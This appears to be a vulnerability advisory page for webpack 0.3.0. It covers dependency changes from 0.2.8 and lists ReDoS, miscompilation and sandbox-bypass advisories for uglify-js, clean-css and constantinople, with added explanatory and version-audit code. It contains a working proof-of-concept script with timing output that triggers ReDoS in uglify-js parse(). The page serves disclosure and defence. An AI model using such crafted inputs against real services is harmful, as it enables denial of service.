Webpack 0.3.0 changes its declared dependencies substantially compared with 0.2.8. The main addition is a set of loaders: raw-loader, jade-loader, json-loader and coffee-loader. With them, Jade templates, JSON data and CoffeeScript source can be required from JavaScript and bundled directly, without a separate pre-compilation step. The loaders are declared as optional dependencies, so a project that does not use those file types does not need to configure them. Version 0.2.8, by contrast, lacks these loaders but depends on vm-browserify and http-browserify, both of which are gone in 0.3.0, suggesting a change in how webpack provides those browser shims. The versions of shared dependencies such as esprima, sprintf, optimist and uglify-js may also differ between the two releases. For users, the wider range of loaders simplifies project setup and the integration of diverse assets, and that is the defining change of this release. It also widens the dependency tree that ships with a build: each loader pulls in its own compiler and that compiler's dependencies, which is why the advisory list below names packages such as clean-css and constantinople that are not among webpack's own dependencies discussed here. Those transitive packages need to be tracked and upgraded like any direct dependency.
All known vulnerabilities affecting version 0.3.0 of the package, including those in its dependency tree
Incorrect Handling of Non-Boolean Comparisons During Minification in uglify-js
Versions of uglify-js prior to 2.4.24 are affected by a vulnerability which may cause crafted JavaScript to have altered functionality after minification. Because the defect silently changes the semantics of the emitted code rather than failing the build, a successful minification run says nothing about whether it was hit; treat any bundle minified with a vulnerable version as suspect rather than trying to detect it after the fact.
Upgrade UglifyJS to version >= 2.4.24.
Regular Expression Denial of Service in uglify-js
Versions of uglify-js prior to 2.6.0 are affected by a regular expression denial of service vulnerability when malicious inputs are passed into the parse() method. The proof of concept below constructs a long numeric literal that triggers the backtracking and times the parser on it; the command-line argument is the number of leading digits.
// Proof of concept: build a long numeric literal and time uglify-js's parser on it.
var u = require('uglify-js');

// Repeat chr len+1 times (the loop deliberately uses <=, as in the original PoC).
var genstr = function (len, chr) {
    var result = "";
    for (var i = 0; i <= len; i++) {
        result = result + chr;
    }
    return result;
};

// Digit count comes from the command line: node test.js <count>
var count = parseInt(process.argv[2], 10);
u.parse("var a = " + genstr(count, "1") + ".1ee7;");
$ time node test.js 10000
real 0m1.091s
user 0m1.047s
sys 0m0.039s
$ time node test.js 80000
real 0m6.486s
user 0m6.229s
sys 0m0.094s
Update to version 2.6.0 or later.
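To see why a crafted number literal costs a regex-based parser so much, the following added example (not code from this page or from uglify-js) implements a toy backtracking matcher with a step counter and runs two patterns over input shaped like the PoC above. The ambiguous pattern, shaped like /^\d*\.?\d*$/, lets the engine split the run of 1s between the two \d* quantifiers in every possible way before it gives up on the trailing "ee7"; the unambiguous form /^\d*(?:\.\d*)?$/ accepts exactly the same strings with a single split. Both patterns are constructed for illustration and are not quoted from the uglify-js parser; the matcher's agreement with the native RegExp engine on a few sample strings is checked in the block.

```javascript
'use strict';
// Added example: a toy backtracking matcher with a step counter. It shows why a
// pattern with two adjacent digit runs (\d*\.?\d*) costs O(n^2) on a crafted
// literal while an equivalent pattern with one unambiguous split costs O(n).
// The patterns are constructed for illustration; this is not uglify-js code.

let steps = 0; // choice points taken during the current match

// Pattern nodes: { cls, min, max } matches a run of characters accepted by cls;
// { seq, min, max } matches a group (sequence of nodes) repeated min..max times.
const digitRun = { cls: ch => ch >= '0' && ch <= '9', min: 0, max: Infinity };
const optDot = { cls: ch => ch === '.', min: 0, max: 1 };
const oneDot = { cls: ch => ch === '.', min: 1, max: 1 };

// Ambiguous form, same shape as /^\d*\.?\d*$/: when no dot follows, the digits
// can be split between the two runs in n+1 ways, and each split is retried on failure.
const AMBIGUOUS = [digitRun, optDot, digitRun];
// Unambiguous form, same shape as /^\d*(?:\.\d*)?$/: a second run can only
// start after a literal dot, so there is exactly one way to consume the digits.
const FIXED = [digitRun, { seq: [oneDot, digitRun], min: 0, max: 1 }];

function matchSeq(seq, i, s, pos, k) {
  if (i === seq.length) return k(pos);
  return matchNode(seq[i], s, pos, p => matchSeq(seq, i + 1, s, p, k));
}

function matchNode(node, s, pos, k) {
  if (node.cls) {
    let avail = 0;
    while (avail < node.max && pos + avail < s.length && node.cls(s[pos + avail])) avail++;
    for (let c = avail; c >= node.min; c--) { // greedy first, then give back one char at a time
      steps++;
      if (k(pos + c)) return true;
    }
    return false;
  }
  return matchGroup(node, 0, s, pos, k);
}

function matchGroup(node, count, s, pos, k) {
  if (count < node.max &&
      matchSeq(node.seq, 0, s, pos, p => p !== pos && matchGroup(node, count + 1, s, p, k))) {
    return true;
  }
  if (count >= node.min) { steps++; return k(pos); } // stop repeating here
  return false;
}

// Anchored full match of s against pattern; returns the verdict and the cost.
function fullMatch(pattern, s) {
  steps = 0;
  const ok = matchSeq(pattern, 0, s, 0, p => p === s.length);
  return { ok, steps };
}

// Cost of rejecting an input shaped like the PoC above: n ones, then ".1ee7".
function costOf(pattern, n) {
  return fullMatch(pattern, '1'.repeat(n) + '.1ee7').steps;
}

// Both patterns accept exactly the same strings; only the cost differs.
const SAMPLES = ['12.5', '12.', '.5', '', '1.2.3', '12e3', '1.1ee7'];
function agreesWithNative() {
  return SAMPLES.every(s =>
    fullMatch(AMBIGUOUS, s).ok === /^\d*\.?\d*$/.test(s) &&
    fullMatch(FIXED, s).ok === /^\d*(?:\.\d*)?$/.test(s) &&
    fullMatch(AMBIGUOUS, s).ok === fullMatch(FIXED, s).ok);
}

console.log('ambiguous n=20/40:', costOf(AMBIGUOUS, 20), costOf(AMBIGUOUS, 40));
console.log('fixed     n=20/40:', costOf(FIXED, 20), costOf(FIXED, 40));
```

On the n=20 and n=40 inputs the ambiguous pattern takes 276 and 946 choice points while the fixed one takes 47 and 87: the first grows quadratically in the digit count, the second linearly. The defensive lesson for anything that tokenizes untrusted source with regular expressions is the same whatever the engine: rewrite overlapping quantifiers so each character has exactly one possible owner, and put an input-length limit and a timeout around the parser for input you do not control.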
Regular Expression Denial of Service in clean-css
Versions of clean-css prior to 4.1.11 are vulnerable to Regular Expression Denial of Service (ReDoS). Untrusted input may cause catastrophic backtracking while matching regular expressions, which makes the application unresponsive and so amounts to a denial of service.
Upgrade to version 4.1.11 or higher.
Sandbox Bypass Leading to Arbitrary Code Execution in constantinople
Versions of constantinople prior to 3.1.1 are vulnerable to a sandbox bypass which can lead to arbitrary code execution. constantinople is the library Jade uses to detect and evaluate constant expressions in templates, so template source reaching the compiler is the untrusted input here.
Update to version 3.1.1 or later.
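The four advisories above all reduce to a fixed-version threshold, so the useful check is whether the versions a project actually resolved fall below those thresholds. The following added example (not from this page, from webpack or from any of the listed packages) encodes the thresholds and audits a set of installed versions with a small semver comparison that treats a prerelease of the fix as still affected. The package-to-version map is constructed for illustration and is not what webpack 0.3.0 really resolves; a real run would flatten the map from the project's lockfile.

```javascript
'use strict';
// Added example: audit an installed dependency set against the fixed-version
// thresholds in the advisories above. The installed versions below are
// constructed for illustration and are not what webpack 0.3.0 resolves.

// Advisories as "vulnerable if installed < fixedIn", taken from the text above.
const ADVISORIES = [
  { pkg: 'uglify-js', fixedIn: '2.4.24', title: 'Incorrect handling of non-boolean comparisons during minification' },
  { pkg: 'uglify-js', fixedIn: '2.6.0', title: 'Regular expression denial of service in parse()' },
  { pkg: 'clean-css', fixedIn: '4.1.11', title: 'Regular expression denial of service' },
  { pkg: 'constantinople', fixedIn: '3.1.1', title: 'Sandbox bypass leading to arbitrary code execution' },
];

// Minimal semver parse: "1.2.3-beta.1+build" -> { nums: [1, 2, 3], pre: ['beta', 1] }.
// Build metadata after '+' is ignored, as the semver spec requires for ordering.
function parseVersion(v) {
  const m = /^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$/.exec(v.trim());
  if (!m) throw new Error(`not a semver version: ${v}`);
  const pre = m[4] ? m[4].split('.').map(id => (/^\d+$/.test(id) ? Number(id) : id)) : [];
  return { nums: [Number(m[1]), Number(m[2]), Number(m[3])], pre };
}

// Comparator: negative if a < b, 0 if equal, positive if a > b. A prerelease sorts
// below its release; numeric prerelease identifiers sort below alphanumeric ones.
function compareVersions(a, b) {
  const pa = parseVersion(a), pb = parseVersion(b);
  for (let i = 0; i < 3; i++) if (pa.nums[i] !== pb.nums[i]) return pa.nums[i] - pb.nums[i];
  if (pa.pre.length === 0 || pb.pre.length === 0) return pb.pre.length - pa.pre.length;
  const n = Math.min(pa.pre.length, pb.pre.length);
  for (let i = 0; i < n; i++) {
    const x = pa.pre[i], y = pb.pre[i];
    if (x === y) continue;
    if (typeof x === 'number' && typeof y === 'number') return x - y;
    if (typeof x === 'number') return -1;
    if (typeof y === 'number') return 1;
    return x < y ? -1 : 1;
  }
  return pa.pre.length - pb.pre.length;
}

// installed: { name: version }, e.g. flattened from a lockfile (constructed here).
// Returns one finding per advisory whose package is present below the fix version.
function audit(installed, advisories = ADVISORIES) {
  const findings = [];
  for (const adv of advisories) {
    const have = installed[adv.pkg];
    if (have === undefined) continue; // package not present: nothing to report
    if (compareVersions(have, adv.fixedIn) < 0) {
      findings.push({ pkg: adv.pkg, installed: have, fixedIn: adv.fixedIn, title: adv.title });
    }
  }
  return findings;
}

// Constructed sample tree for illustration.
const SAMPLE_INSTALLED = {
  'uglify-js': '2.4.24',         // past the comparison fix, still below 2.6.0
  'clean-css': '4.1.11',         // exactly at the fix: not affected
  'constantinople': '3.1.1-rc1', // prerelease of the fix: still affected
};

for (const f of audit(SAMPLE_INSTALLED)) {
  console.log(`${f.pkg}@${f.installed} < ${f.fixedIn}: ${f.title}`);
}
```

Two details matter in practice. A lockfile can contain several copies of the same package at different versions, so a real audit must flatten every occurrence rather than one entry per name. And the comparison is against the fix version, not the latest release: a pinned "2.4.24" clears the first uglify-js advisory and still fails the second, which is why the sample reports it.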